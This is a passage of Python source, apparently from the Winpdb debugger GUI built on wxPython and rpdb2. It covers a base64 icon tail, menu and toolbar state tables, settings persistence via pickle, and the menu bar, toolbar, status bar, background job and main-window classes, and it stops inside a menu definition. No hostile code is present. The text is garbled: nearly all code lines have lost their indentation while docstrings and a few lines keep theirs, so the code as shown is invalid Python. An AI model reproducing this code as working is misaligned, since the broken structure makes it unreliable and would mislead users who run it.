hpYX5rKx8BM5Wi\nJM3IHwD+0bJio76efwXcQGnIpLe7mynFGi4tjE254hbJw5RgIzT+B5Su+6qIbFRKHYtqAMDLhTne\nK8qLczlk2XKqlZ6ZsA4wRbBF7dah47bruMMDAHwADAwM0Hj0KB6vl5NwigClOGLtpUdlp1K0A2Ka\nfNrczD7gfCALCOh9ZNodDHKhI02MHPsFTL3ZgbLfAzwYT8DvgE1/dt4s38H6ljTg43d7Ii83TUHT\nFDZNyHYNkGHXCbpcEBoguvRpbWrCkZPDLG1wEnovUBGnAQVAJ9AXCKB0nWlWew+Q54mbOWLPjJCA\n4AloewcmX7ZWRB5SShl2yxv7ReTfLp4//a+f3VZFU1tPkt2c08FDJICyaRo+Z8giwKA1Pwf8PVwK\n/BVw0DC4s72drHgClOJkQv+uAZpEqDYMbgaKrPbjGRoL8x1J9nNGkRo78SpMvqzEyirtjB+SH9lt\nWt/aVUsGhbbpwAOYEtGAPHe/tXIboH5mSayb9wD/AiwWiURq0aLrdOg6xBWbrnOPYfATYGXcO/T5\nbgYrjzZyJxiVjj+BGACrBmWFlVJNwOZLF5WzaGZx0jWAmcTmBkI6HpeNQk9vLG53n19OdZxqC/BD\ny/XGb/53xdWPAOuB6616VPoB56r
swS/VA5GR7Ppo5ATofvAfBFiebGfoMaU4+I0bL8HtcgwJHqCl\nK8A5BS6yowsWZ5AZU91sPfdUxuoT4LcW+LuBZqu907r6gTuB96yZIz4ptrXYweqVvoS3mrD/QfAf\nGF0aKFADMPc0ApRSQeC2wpys0HfXrYo5OTONtz3ZGaAwJ+u0BUv+LQv5L48TLFvOimoMEB23XiAM\nfAi0xwUmy616nYKi+4px2sf46EzvUYBCEcnWkoSnu4C7z59Tyv03XMxQuduTnQF83kkJq7Yg5xRq\nHL9/CVV2DY91rqYIKAXOi254WCQsAGZZ5Z+sqbEF2HvbZJZVesZ+QzAUi0wn21PE6D8XkRnXXTL/\nO6YIm17YSarNiJZOPw5HBvkeDc0IWiu2yMrt80u9HH54Hl2bDrKyV2dbwrNhi4AS4OW49hoNau4o\n4Iab8hgXMfqiNZ+W5msPAY/fsHwBj991JZkuR0oNAJg8KSs2+pHSj8/RzyXnuyl8ejbPLfNyOOHZ\nJXPc9MZ9bgdenJGBf3MZ144XeADRY5GwPeXJiYgX/7aINCxfdM6Tv3zwS/ZHf/0W+z89mZSAXJ+P\nYDBoxerh2NI1QwuTN0WY++hU9n0ywO+3daPt7UU1hHAXOXi9LkhNkQOZl0nOCh83LvUw7qflbDGz\n8tuHPEKi1I9FZH9ZYc6vntlwQ9lL7+zjF1t30xXot0wgQkC2NxtnZ9ACHyLDFsap6djUKdNZUO5i\nwdcKYp/XmCTM72dIHLFptWtYr1dK7QAW2jT19JdXLNRf2riOr1+7jCl5Ptp7+tANkyxPDj57RO29\n9iBuW3gQ+KT5uLMBHsBdFp2ETozmpOhsYCNwgyli31vbxNyyQmzt2+HjDdg1A8UEl8XPQN7FVUqp\npSMeA6XUIaXUzUCZptT3llaUVGc47TjyKnFo5sQHr2yQvRjg/VRnhIZLRJNS6lGl1CJgPc5cyJrN\nhBffArBnAfz3ZyIgQX4P6BReOfEJiPQxSOSQ9tgQoJRqAV6n+IsRFZuoojmhcA3AFqVU91hqAMAz\nuIqg8KqJS0DxteDMBfhJwsJ6TOQ1oJrp60HZJ+bol90ZdX7bx5wApZQAj+Aph9J1E4+AstvBPRXg\nu/H7EWMaiiilXgVepfwecJdOHPCeGTD9awDPK6UGrcnGfNoWkVJgL/79uexeC+ZZ/n+ULQPOex48\nFSeBxYn7g2MejCqlGoBb8c4T5jw2HhyPLOiZ9wR4KkxgXbLN0XGJxpVSrwHfpmgNzH747JCgNPjc\nRpi8CuDeRNUfNxNIMIfHgW9xYgsceCR+HT7+Hn/e41DwBYDvK6U2puRpnAkA+A7wGN17FR9viGxZ\nj+tKbyrM3wy++SawQSn1ZFpFORMDIiJfAn5KuDub2k3Q9DKj2tQYSuVLboIZ94Pd2wH8pVJqy5CP\nnSmTFJEZwM+BS+mphk9+DO07xwI55K+A8nvAOxfgTeCu4f7j7Ix6J+v83jrgB0AZgRpoegVO/hFC\n7SP7MdfkSFw/5XrwzASoAx625vqR0HfmxfpzxloiO2eVIOA/BF27IFALfZ9CuAN0K3trzwRHLnjO\nAc8syDkPsiqi3X+fyO7b80opfRT6c3bF+ofadUSO7F8IZA7xSC/wJyuef1kpdfgzGtDEERHRgGlE\n9kZyAa/lLf1AB5FtwwallDlW7/w/D+GUlNdUS4wAAAAASUVORK5CYII=\n'
SB_LINE = "Line"
SB_COL = "Col"
SB_STATE = "State"
SB_ENCRYPTION = "Encryption"
SHOW = "Show"
VALUE = "Value"
BITMAP = "Bitmap"
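#
# Menu and toolbar item states per debugger state: each dict lists the
# items to enable and disable, and STATE_MAP maps an rpdb2 state to its
# (menu, toolbar) pair.
#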
STATE_SPAWNING_MENU = {ENABLED: [ML_STOP, ML_DETACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_RESTART]}
STATE_ATTACHING_MENU = {ENABLED: [ML_STOP, ML_DETACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_RESTART]}
STATE_BROKEN_MENU = {ENABLED: [ML_ANALYZE, ML_GO, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART], DISABLED: [ML_PWD, ML_LAUNCH, ML_ATTACH, ML_BREAK]}
STATE_ANALYZE_MENU = {ENABLED: [ML_ANALYZE, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART], DISABLED: [ML_PWD, ML_LAUNCH, ML_ATTACH, ML_BREAK, ML_GO, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO]}
STATE_RUNNING_MENU = {ENABLED: [ML_BREAK, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART], DISABLED: [ML_ANALYZE, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_GO, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO]}
STATE_DETACHED_MENU = {ENABLED: [ML_PWD, ML_LAUNCH, ML_ATTACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_STOP, ML_DETACH, ML_RESTART]}
STATE_DETACHING_MENU = {ENABLED: [ML_STOP, ML_DETACH], DISABLED: [ML_ANALYZE, ML_GO, ML_BREAK, ML_STEP, ML_NEXT, ML_RETURN, ML_JUMP, ML_GOTO, ML_TOGGLE, ML_DISABLE, ML_ENABLE, ML_CLEAR, ML_LOAD, ML_MORE, ML_SAVE, ML_OPEN, ML_PWD, ML_LAUNCH, ML_ATTACH, ML_RESTART]}
STATE_BROKEN_TOOLBAR = {ENABLED: [TB_EXCEPTION, TB_FILTER, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO], DISABLED: [TB_BREAK]}
STATE_ANALYZE_TOOLBAR = {ENABLED: [TB_EXCEPTION, TB_FILTER], DISABLED: [TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_RUNNING_TOOLBAR = {ENABLED: [TB_BREAK], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_SPAWNING_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_ATTACHING_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_DETACHED_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_DETACHING_TOOLBAR = {ENABLED: [], DISABLED: [TB_EXCEPTION, TB_FILTER, TB_BREAK, TB_GO, TB_STEP, TB_NEXT, TB_RETURN, TB_GOTO]}
STATE_MAP = {
rpdb2.STATE_SPAWNING: (STATE_SPAWNING_MENU, STATE_SPAWNING_TOOLBAR),
rpdb2.STATE_ATTACHING: (STATE_ATTACHING_MENU, STATE_ATTACHING_TOOLBAR),
rpdb2.STATE_BROKEN: (STATE_BROKEN_MENU, STATE_BROKEN_TOOLBAR),
rpdb2.STATE_ANALYZE: (STATE_ANALYZE_MENU, STATE_ANALYZE_TOOLBAR),
rpdb2.STATE_RUNNING: (STATE_RUNNING_MENU, STATE_RUNNING_TOOLBAR),
rpdb2.STATE_DETACHED: (STATE_DETACHED_MENU, STATE_DETACHED_TOOLBAR),
rpdb2.STATE_DETACHING: (STATE_DETACHING_MENU, STATE_DETACHING_TOOLBAR)
}
LICENSE_TITLE = 'License.'
ABOUT_TITLE = 'About ' + WINPDB_TITLE
ABOUT_HTML_PREFIX = """
<html>
<body>
<p>
"""
ABOUT_HTML_SUFFIX = """
</p>
</body>
</html>
"""
WEBSITE_URL = "http://www.winpdb.org/"
SUPPORT_URL = "http://www.winpdb.org/?page_id=4"
DOCS_URL = "http://www.winpdb.org/?page_id=5"
EXT_DOCS_URL = "http://www.winpdb.org/?page_id=17"
UPDATES_URL = "http://www.winpdb.org/?page_id=3"
STR_ERROR_INTERFACE_COMPATIBILITY = "The rpdb2 module found by Winpdb is of an unexpected version (expected: %s, found: %s). Please upgrade to the latest versions of winpdb.py and rpdb2.py."
STR_NAMESPACE_DEADLOCK = 'Data Retrieval Timeout'
STR_NAMESPACE_LOADING = 'Loading...'
BAD_FILE_WARNING_TIMEOUT_SEC = 10.0
DIRTY_CACHE = 1
POSITION_TIMEOUT = 2.0
FILTER_LEVELS = ['Off', 'Medium', 'Maximum']
g_ignored_warnings = {'': True}
g_fUnicode = 'unicode' in wx.PlatformInfo
assert(g_fUnicode or not rpdb2.is_py3k())
def calc_title(path):
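    """
    Build the main window title from a script path: the file name, the
    (possibly ~-abbreviated and clipped) directory, and the Winpdb title.
    """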
(dn, bn) = os.path.split(path)
if dn == '':
return '%s - %s' % (bn, WINPDB_TITLE)
if os.name != rpdb2.POSIX:
return '%s (%s) - %s' % (bn, rpdb2.calc_suffix(dn, 64), WINPDB_TITLE)
home = os.path.expanduser('~')
if dn.startswith(home):
dn = '~' + dn[len(home):]
return '%s (%s) - %s' % (bn, rpdb2.calc_suffix(dn, 64), WINPDB_TITLE)
def calc_denominator(string_list):
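    """
    Return the longest common prefix of the strings in string_list, or an
    empty string for an empty or None list, e.g.
    calc_denominator(['abcd', 'abef']) == 'ab'.
    """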
if string_list in [[], None]:
return ''
d = string_list[0]
for s in string_list[1:]:
i = 0
while i < min(len(d), len(s)):
if d[i] != s[i]:
break
i += 1
if i == 0:
return ''
d = d[:i]
return d
def open_new(url):
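    """
    Open url in a new browser window. On Ubuntu's Python 2.5 Firefox is
    invoked directly with -new-window to work around the webbrowser module
    behaviour there.
    """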
if sys.version.startswith('2.5.') and 'ubuntu' in sys.version:
w = webbrowser.get()
if 'firefox' in w.name:
cmd = '%s -new-window "%s"' % (w.name, url)
os.popen(cmd)
return
webbrowser.open_new(url)
def image_from_base64(str_b64):
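    """
    Decode a base64-encoded image into a wx.Image.
    """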
b = rpdb2.as_bytes(str_b64)
s = base64.decodestring(b)
stream = cStringIO.StringIO(s)
image = wx.ImageFromStream(stream)
return image
class CSettings:
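    """
    Persistent GUI settings: a dictionary of defaults that is pickled to a
    dot file under the user's home directory on POSIX, or to the temp
    directory elsewhere (see calc_path()). Values are read and written with
    dictionary syntax, e.g.:

        settings = CSettings(WINPDB_SETTINGS_DEFAULT)
        settings.load_settings()
        size = settings[WINPDB_SIZE]
    """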
def __init__(self, default_settings):
self.m_dict = default_settings
def calc_path(self):
if os.name == rpdb2.POSIX:
home = os.path.expanduser('~')
path = os.path.join(home, '.' + WINPDB_SETTINGS_FILENAME)
return path
#
# gettempdir() is used since it works with unicode user names on
# Windows.
#
tmpdir = tempfile.gettempdir()
path = os.path.join(tmpdir, WINPDB_SETTINGS_FILENAME)
return path
def load_settings(self):
try:
path = self.calc_path()
f = open(path, 'rb')
except IOError:
return
try:
d = pickle.load(f)
self.m_dict.update(d)
except:
rpdb2.print_debug_exception()
f.close()
def save_settings(self):
try:
path = self.calc_path()
f = open(path, 'wb')
except IOError:
return
try:
pickle.dump(self.m_dict, f)
finally:
f.close()
def __getitem__(self, key):
return self.m_dict[key]
def __setitem__(self, key, value):
self.m_dict[key] = value
class CMenuBar:
def __init__(self):
self.m_menubar = None
self.m_encapsulating_menu_items = {}
self.m_cascades = {}
def init_menubar(self, resource):
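        """
        Build the menu bar from a resource dict keyed by '/'-separated paths
        (see menu_resource in CWinpdbWindow.__init__): purely numeric path
        components only fix the ordering and are dropped, the remaining
        components name cascades and items. ML_SEPARATOR adds a separator,
        ML_EMPTY leaves a cascade empty, and each item entry supplies
        COMMAND and optionally TOOLTIP.
        """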
if 'wxMac' in wx.PlatformInfo:
wx.MenuBar.SetAutoWindowMenu(False)
self.m_menubar = wx.MenuBar()
self.m_cascades = {ML_ROOT: self.m_menubar}
        k = sorted(resource.keys())
for c in k:
s = (ML_ROOT + c).split('/')
sc = [e for e in s if not e.isdigit()]
for i, e in enumerate(sc[:-1]):
if not e in self.m_cascades:
parent_label = sc[i - 1]
parent = self.m_cascades[parent_label]
child = wx.Menu()
if parent_label == ML_ROOT:
parent.Append(child, e)
else:
parent.AppendMenu(wx.NewId(), e, child)
self.m_encapsulating_menu_items[e] = parent
self.m_cascades[e] = child
parent_label = sc[-2]
parent = self.m_cascades[parent_label]
item_label = sc[-1]
if item_label == ML_EMPTY:
continue
if item_label == ML_SEPARATOR:
parent.AppendSeparator()
continue
command = resource[c][COMMAND]
tip = resource[c].get(TOOLTIP, wx.EmptyString)
item = parent.Append(-1, item_label, tip)
self.Bind(wx.EVT_MENU, command, item)
self.m_encapsulating_menu_items[item_label] = parent
#
# Must be done after menu is added to menu bar.
#
self.SetMenuBar(self.m_menubar)
if 'wxMac' in wx.PlatformInfo:
wx.GetApp().SetMacHelpMenuTitleName("&Help")
def set_menu_items_state(self, state_label_dict):
for state, label_list in state_label_dict.items():
for item_label in label_list:
parent = self.m_encapsulating_menu_items[item_label]
id = parent.FindItem(item_label)
parent.Enable(id, [True, False][state == DISABLED])
def add_menu_item(self, menu_label, item_label, command):
if not g_fUnicode:
item_label = rpdb2.as_string(item_label, wx.GetDefaultPyEncoding())
parent = self.m_cascades[menu_label]
item = parent.Append(-1, item_label)
self.Bind(wx.EVT_MENU, command, item)
def clear_menu_items(self, menu_label):
parent = self.m_cascades[menu_label]
while parent.GetMenuItemCount() > 0:
i = parent.FindItemByPosition(0)
parent.DeleteItem(i)
class CToolBar:
def __init__(self):
self.m_toolbar = None
self.m_items = {}
def init_toolbar(self, resource):
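        """
        Build the toolbar from a list of dicts: ML_SEPARATOR entries add
        separators, TEXT entries become borderless text buttons, and DATA
        entries become bitmap tools (DATA2 supplies the bitmap used for the
        toggled state of two-state tools). Every entry binds its COMMAND.
        """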
self.m_toolbar = self.CreateToolBar(wx.TB_HORIZONTAL | wx.NO_BORDER | wx.TB_FLAT | wx.TB_TEXT)
self.m_toolbar.SetToolBitmapSize(TOOLBAR_BITMAP_SIZE)
for e in resource:
item_label = e[LABEL]
if item_label == ML_SEPARATOR:
self.m_toolbar.AddSeparator()
continue
command = e[COMMAND]
id = wx.NewId()
if TEXT in e:
button = wx.Button(self.m_toolbar, id, e[TEXT], style = wx.NO_BORDER)
button.SetToolTipString(item_label)
self.m_toolbar.AddControl(button)
self.m_items[item_label] = {ID: id}
wx.EVT_BUTTON(self.m_toolbar, id, command)
continue
if DATA in e:
image = image_from_base64(e[DATA])
bitmap = wx.BitmapFromImage(image)
if DATA2 in e:
image2 = image_from_base64(e[DATA2])
bitmap2 = wx.BitmapFromImage(image2)
self.m_toolbar.AddSimpleTool(id, bitmap, item_label, isToggle = True)
self.m_items[item_label] = {ID: id, DATA: bitmap, DATA2: bitmap2}
self.Bind(wx.EVT_TOOL, command, id = id)
self.Bind(wx.EVT_TOOL, self.OnToggleTool, id = id)
else:
self.m_toolbar.AddSimpleTool(id, bitmap, item_label)
self.m_items[item_label] = {ID: id}
self.Bind(wx.EVT_TOOL, command, id = id)
self.m_toolbar.Realize()
def set_toolbar_item_text(self, label, text):
item = self.m_items[label]
id = item[ID]
tool = self.m_toolbar.FindControl(id)
tool.SetLabel(text)
size = tool.GetBestSize()
tool.SetSize(size)
def set_toolbar_items_state(self, state_label_dict):
for state, label_list in state_label_dict.items():
for label in label_list:
id = self.m_items[label][ID]
if (wx.Platform == '__WXGTK__') and (state == ENABLED):
self.__gtk_enable_tool(id)
else:
self.m_toolbar.EnableTool(id, [True, False][state == DISABLED])
def __gtk_enable_tool(self, id):
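        """
        Enable a tool under wxGTK. If the mouse is currently over the
        toolbar, the pointer is briefly warped away and back, apparently so
        that the tool is redrawn in its enabled state while hovered.
        """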
p = self.m_toolbar.ScreenToClient(wx.GetMousePosition())
(x, y) = self.m_toolbar.GetSize()
r = wx.RectS((x, y))
if r.Inside(p):
self.m_toolbar.WarpPointer(p.x, p.y + 2 * y)
self.m_toolbar.EnableTool(id, True)
if r.Inside(p):
self.m_toolbar.WarpPointer(p.x, p.y)
def set_toggle(self, label, fToggle):
item = self.m_items[label]
id = item[ID]
bitmap = [item[DATA], item[DATA2]][fToggle]
tool = self.m_toolbar.FindById(id)
tool.SetNormalBitmap(bitmap)
self.m_toolbar.ToggleTool(id, fToggle)
if wx.Platform == '__WXMSW__':
self.m_toolbar.Realize()
else:
            self.m_toolbar.ToggleTool(id, not fToggle)
            self.m_toolbar.ToggleTool(id, fToggle)
def OnToggleTool(self, event):
tool = self.m_toolbar.FindById(event.GetId())
if tool is None:
event.Skip()
return
label = tool.GetShortHelp()
f = event.IsChecked()
self.set_toggle(label, f)
event.Skip()
class CStatusBar:
def __init__(self):
self.m_statusbar = None
self.m_widths = []
self.m_formats = []
self.m_keys = []
self.m_data = {}
self.m_bitmaps = {}
self.sizeChanged = False
def init_statusbar(self, resource):
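        """
        Create the status bar from a list of dicts giving each field's
        WIDTH, an optional printf-style FORMAT (or BITMAP for an image
        field) and the data KEYS that cause the field to refresh when
        passed to set_statusbar_data().
        """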
self.m_widths = [e[WIDTH] for e in resource]
self.m_formats = [e.get(FORMAT, "") for e in resource]
self.m_keys = [e.get(KEYS, []) for e in resource]
self.m_statusbar = self.CreateStatusBar(1, wx.ST_SIZEGRIP)
self.m_statusbar.SetFieldsCount(len(self.m_widths))
self.m_statusbar.SetStatusWidths(self.m_widths)
self.m_statusbar.Bind(wx.EVT_SIZE, self.OnSize)
self.m_statusbar.Bind(wx.EVT_IDLE, self.OnIdle)
def set_statusbar_data(self, data):
self.m_data.update(data)
for i, e in enumerate(self.m_keys):
for k in e:
if k in data:
if self.m_formats[i] == BITMAP:
self.set_bitmap(i, data[k][0], data[k][1])
else:
self.m_statusbar.SetStatusText(self.m_formats[i] % self.m_data, i)
break
def set_bitmap(self, i, data, tooltip):
if not i in self.m_bitmaps:
if data is None:
return
image = image_from_base64(data)
bitmap = wx.BitmapFromImage(image)
p = wx.Panel(self.m_statusbar)
sb = wx.StaticBitmap(p, -1, bitmap)
self.m_bitmaps[i] = (p, sb, tooltip)
else:
if data is None:
self.m_bitmaps[i][0].Hide()
else:
image = image_from_base64(data)
bitmap = wx.BitmapFromImage(image)
self.m_bitmaps[i][1].SetBitmap(bitmap)
self.m_bitmaps[i][0].Show()
self.reposition()
def reposition(self):
for i, (p, sb, tooltip) in self.m_bitmaps.items():
rect = self.m_statusbar.GetFieldRect(i)
p.SetPosition((rect.x + 2, rect.y + 2))
s = sb.GetSize()
sb.SetSize((s[0], rect.height - 4))
sb.SetToolTipString(tooltip)
p.SetToolTipString(tooltip)
p.SetClientSize(sb.GetSize())
self.sizeChanged = False
def OnSize(self, event):
self.reposition()
self.sizeChanged = True
def OnIdle(self, event):
if self.sizeChanged:
self.reposition()
class CJobs:
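    """
    Mixin for running jobs on background threads. job_post() starts a worker
    thread; the job's return value and sys.exc_info() are delivered to the
    optional callback on the GUI thread via wx.CallAfter(). A wait cursor is
    shown (through the host's set_cursor()) while any job is outstanding,
    and shutdown_jobs() blocks until all jobs have finished.
    """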
def __init__(self):
self.__m_jobs_lock = threading.RLock()
self.__m_n_expected_jobs = 0
self.__m_f_shutdown = False
def init_jobs(self):
pass
def shutdown_jobs(self):
self.__m_f_shutdown = True
while 1:
try:
self.__m_jobs_lock.acquire()
if self.__m_n_expected_jobs == 0:
return
finally:
self.__m_jobs_lock.release()
time.sleep(0.1)
def job_post(self, job, args, kwargs = {}, callback = None):
threading.Thread(target = self.job_do, args = (job, args, kwargs, callback)).start()
def job_do(self, job, args, kwargs, callback):
try:
self.__m_jobs_lock.acquire()
if self.__m_f_shutdown:
return
if self.__m_n_expected_jobs == 0:
wx.CallAfter(self.set_cursor, wx.CURSOR_WAIT)
self.__m_n_expected_jobs += 1
finally:
self.__m_jobs_lock.release()
r = None
exc_info = (None, None, None)
try:
r = job(*args, **kwargs)
except:
exc_info = sys.exc_info()
            if callback is None:
rpdb2.print_debug_exception()
if callback is not None:
wx.CallAfter(callback, r, exc_info)
try:
self.__m_jobs_lock.acquire()
self.__m_n_expected_jobs -= 1
if self.__m_n_expected_jobs == 0:
wx.CallAfter(self.set_cursor, wx.CURSOR_ARROW)
finally:
self.__m_jobs_lock.release()
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
class CMainWindow(CMenuBar, CToolBar, CStatusBar, CJobs):
def __init__(self):
CMenuBar.__init__(self)
CToolBar.__init__(self)
CStatusBar.__init__(self)
CJobs.__init__(self)
class CAsyncSessionManagerCall:
def __init__(self, session_manager, job_manager, f, callback, ftrace = False):
self.m_session_manager = session_manager
self.m_job_manager = job_manager
self.m_f = f
self.m_callback = callback
self.m_ftrace = ftrace
def __wrapper(self, *args, **kwargs):
if self.m_callback != None:
try:
if self.m_ftrace:
rpdb2.print_debug('Calling %s' % repr(self.m_f))
return self.m_f(*args, **kwargs)
finally:
if self.m_ftrace:
rpdb2.print_debug('Returned from %s' % repr(self.m_f))
try:
self.m_f(*args, **kwargs)
except rpdb2.FirewallBlock:
self.m_session_manager.report_exception(*sys.exc_info())
dlg = wx.MessageDialog(self.m_job_manager, rpdb2.STR_FIREWALL_BLOCK, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
except (socket.error, rpdb2.CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except rpdb2.CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
rpdb2.print_debug_exception(True)
def __call__(self, *args, **kwargs):
if self.m_job_manager == None:
return
self.m_job_manager.job_post(self.__wrapper, args, kwargs, self.m_callback)
class CAsyncSessionManager:
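    """
    Proxy that exposes the session-manager methods as asynchronous calls.
    Attribute access returns a callable that posts the real method through
    the job manager (a CJobs instance), so the GUI thread is never blocked;
    exceptions are reported via session_manager.report_exception(). Use
    with_callback() to receive (result, exc_info) when the call completes,
    e.g.:

        self.m_async_sm.with_callback(self.callback_load).load_breakpoints()
    """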
def __init__(self, session_manager, job_manager, callback = None, ftrace = False):
self.m_session_manager = session_manager
self.m_callback = callback
self.m_ftrace = ftrace
self.m_weakref_job_manager = None
if job_manager != None:
self.m_weakref_job_manager = weakref.ref(job_manager)
def with_callback(self, callback, ftrace = False):
if self.m_weakref_job_manager != None:
job_manager = self.m_weakref_job_manager()
else:
job_manager = None
asm = CAsyncSessionManager(self.m_session_manager, job_manager, callback, ftrace)
return asm
def __getattr__(self, name):
f = getattr(self.m_session_manager, name)
if not hasattr(f, '__call__'):
raise TypeError(repr(type(f)) + ' object is not callable')
if self.m_weakref_job_manager != None:
job_manager = self.m_weakref_job_manager()
else:
job_manager = None
return CAsyncSessionManagerCall(self.m_session_manager, job_manager, f, self.m_callback, self.m_ftrace)
class CWinpdbWindow(wx.Frame, CMainWindow):
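    """
    Main Winpdb frame. Builds the menu bar, toolbar and status bar, lays out
    the namespace, threads, stack, source and console panes in splitters,
    and registers callbacks on the session manager so that debugger events
    (state, stack, threads, breakpoints, etc.) update the GUI.
    """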
def __init__(self, session_manager, settings):
CMainWindow.__init__(self)
wx.Frame.__init__(self, None, -1, WINPDB_TITLE, size = settings[WINPDB_SIZE],
style = wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE)
#
# Force 'Left to Right' as long as internationalization is not supported.
# Not available on wxPython 2.6
#
if hasattr(self, 'SetLayoutDirection'):
self.SetLayoutDirection(1)
image = image_from_base64(BASE64_ICON_16)
bitmap = wx.BitmapFromImage(image)
icon16 = wx.EmptyIcon()
icon16.CopyFromBitmap(bitmap)
image = image_from_base64(BASE64_ICON_32)
bitmap = wx.BitmapFromImage(image)
icon32 = wx.EmptyIcon()
icon32.CopyFromBitmap(bitmap)
image = image_from_base64(BASE64_ICON_64)
bitmap = wx.BitmapFromImage(image)
icon64 = wx.EmptyIcon()
icon64.CopyFromBitmap(bitmap)
ibundle = wx.IconBundle()
ibundle.AddIcon(icon16)
ibundle.AddIcon(icon32)
ibundle.AddIcon(icon64)
self.SetIcons(ibundle)
self.Maximize(settings[WINPDB_MAXIMIZE])
self.m_session_manager = session_manager
self.m_async_sm = CAsyncSessionManager(session_manager, self)
self.m_source_manager = CSourceManager(self, session_manager)
self.m_settings = settings
self.m_stack = None
self.m_state = rpdb2.STATE_DETACHED
self.m_fembedded_warning = True
self.m_filter_level = 1
self.SetMinSize(WINPDB_SIZE_MIN)
self.SetSize(settings[WINPDB_SIZE])
self.Centre(wx.BOTH)
self.init_jobs()
menu_resource = {
"/0/" + ML_FILE + "/0/" + ML_PWD: {COMMAND: self.do_password, TOOLTIP: PWD_TIP},
"/0/" + ML_FILE + "/1/" + ML_LAUNCH: {COMMAND: self.do_launch, TOOLTIP: LAUNCH_TIP},
"/0/" + ML_FILE + "/2/" + ML_ATTACH: {COMMAND: self.do_attach, TOOLTIP: ATTACH_TIP},
"/0/" + ML_FILE + "/3/" + ML_OPEN: {COMMAND: self.do_open, TOOLTIP: OPEN_TIP},
"/0/" + ML_FILE + "/4/" + ML_DETACH: {COMMAND: self.do_detach, TOOLTIP: DETACH_TIP},
"/0/" + ML_FILE + "/5/" + ML_STOP: {COMMAND: self.do_stop, TOOLTIP: STOP_TIP},
"/0/" + ML_FILE + "/6/" + ML_RESTART: {COMMAND: self.do_restart, TOOLTIP: RESTART_TIP},
"/0/" + ML_FILE + "/7/" + ML_SEPARATOR: None,
"/0/" + ML_FILE + "/8/" + ML_EXIT: {COMMAND: self.do_exit},
"/1/" + ML_BREAKPOINTS + "/0/" + ML_TOGGLE: {COMMAND: self.toggle_breakpoint, TOOLTIP: TOGGLE_TIP},
"/1/" + ML_BREAKPOINTS + "/1/" + ML_DISABLE: {COMMAND: self.do_disable, TOOLTIP: DISABLE_TIP},
"/1/" + ML_BREAKPOINTS + "/2/" + ML_ENABLE: {COMMAND: self.do_enable, TOOLTIP: ENABLE_TIP},
"/1/" + ML_BREAKPOINTS + "/3/" + ML_CLEAR: {COMMAND: self.do_clear, TOOLTIP: CLEAR_TIP},
"/1/" + ML_BREAKPOINTS + "/4/" + ML_LOAD: {COMMAND: self.do_load, TOOLTIP: LOAD_TIP},
"/1/" + ML_BREAKPOINTS + "/5/" + ML_SAVE: {COMMAND: self.do_save, TOOLTIP: SAVE_TIP},
"/1/" + ML_BREAKPOINTS + "/6/" + ML_MORE: {COMMAND: self.do_more_bp, TOOLTIP: MORE_TIP},
"/2/" + ML_CONTROL + "/0/" + ML_ANALYZE: {COMMAND: self.do_analyze_menu, TOOLTIP: ANALYZE_TIP},
"/2/" + ML_CONTROL + "/1/" + ML_BREAK: {COMMAND: self.do_break, TOOLTIP: BREAK_TIP},
"/2/" + ML_CONTROL + "/2/" + ML_GO: {COMMAND: self.do_go, TOOLTIP: GO_TIP},
"/2/" + ML_CONTROL + "/3/" + ML_NEXT: {COMMAND: self.do_next, TOOLTIP: NEXT_TIP},
"/2/" + ML_CONTROL + "/4/" + ML_STEP: {COMMAND: self.do_step, TOOLTIP: STEP_TIP},
"/2/" + ML_CONTROL + "/5/" + ML_GOTO: {COMMAND: self.do_goto, TOOLTIP: GOTO_TIP},
"/2/" + ML_CONTROL + "/6/" + ML_RETURN: {COMMAND: self.do_return, TOOLTIP: RETURN_TIP},
